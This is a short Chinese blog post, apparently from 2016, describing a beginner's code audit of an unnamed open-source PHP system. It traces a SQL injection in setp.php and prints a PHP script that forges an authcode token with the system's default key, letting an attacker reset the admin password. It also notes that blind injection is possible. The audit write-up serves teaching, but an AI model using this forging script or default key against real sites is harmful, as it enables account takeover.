对某PHP开源系统的一次粗略审计

###0x01 前言
这是一篇16年所写的入门级代码审计文章,比较简单。由于之前的博客数据没有完整的保存下来只能一个一个的找到并记录下来。

###0x02 初览
先用Seay大神的工具对代码进行初步分析:

发现setp.php 中可能存在SQL注入,打开文件看看代码,关注26行

if($db->query(“update “.C(‘DB_PREFIX’).”users set pwd=’$pwd’ where user=’$user’ “))

往上朔源追踪$user

$code=authcode(base64_decode($_GET[‘code’]),’DECODE’,$syskey);
$arr=explode(‘||||’,$code);
$user=$arr[0];

没有对参数进行任何的处理,直接就入库了。这段代码的意思呢,就是通过get方式传入code参数,再将参数用base64解密,然后再将解密后的密文通过authcode这个函数再次解密,然后进入下面的流程。
Authcode这个函数是dz的,这里只是照搬过来。具体用法参照百度,这里不再赘述
由于要用到$syskey,所以我们看看上面包含的cons.php 这个文件

###0x03 利用
Key默认是不会改变的。只要key不变,就能利用
知道解密方式,反过来写出加密过程。
加密代码如下:

<?php
include_once “functions.php”;
$syskey=’Kl3RsQspczEsK1’;
$keycode=$_GET[‘c’];
$m_codes = base64_encode(authcode($keycode.’||||’.time(),’ENCODE’,$syskey));
echo $m_codes;
?>

Functions.php

<?php
function authcode($string, $operation = ‘DECODE’, $key = ‘’, $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : ENCRYPT_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == ‘DECODE’ ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ‘’;
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == ‘DECODE’ ? base64_decode(substr($string, $ckey_length)) : sprintf(‘%010d’, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = ‘’;
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}
for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}
for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}
if($operation == ‘DECODE’) {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return ‘’;
}
} else {
return $keyc.str_replace(‘=’, ‘’, base64_encode($result));
}
}
?>

通过该代码我们逆向出admin的密文

成功绕过验证 直接修改admin的密码就可以了

###0x04 结语
另外这个参数还可以用来盲注,写个脚本跑就可以了。在这里由于已拿到后台就不做陈述